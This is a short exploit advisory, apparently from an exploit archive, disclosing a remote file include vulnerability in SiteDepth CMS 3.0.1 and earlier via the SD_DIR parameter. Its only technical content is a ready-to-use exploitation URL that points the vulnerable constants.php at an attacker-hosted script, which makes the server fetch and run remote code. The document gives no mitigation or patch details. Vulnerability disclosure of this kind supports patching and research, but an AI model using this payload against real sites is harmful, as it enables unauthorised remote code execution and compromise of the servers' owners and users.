id: 598
date: 07/19/2006
title: SiteDepth CMS <= 3.0.1 (SD_DIR) Remote File Include Vulnerability
author: Aesthetico
cves: 

=================================================================
SiteDepth CMS <= 3.0.1 (SD_DIR) Remote File Include Vulnerability
=================================================================


Title: SiteDepth CMS <= 3.0.1 - Remote File Include Vulnerability
------------------------------------------------------------------
Vendor: SiteDepth.com
URL: http://sitedepth.com
------------------------------------------------------------------
Credits:
Discovered by: "Aesthetico"
http://www.majorsecurity.de
------------------------------------------------------------------

Exploitation:
------------------------------------------------------------------
http://victim.com/constants.php?SD_DIR=http://www.yourspace.com/yourscript.php?



#  0day.today [2023-03-22]  #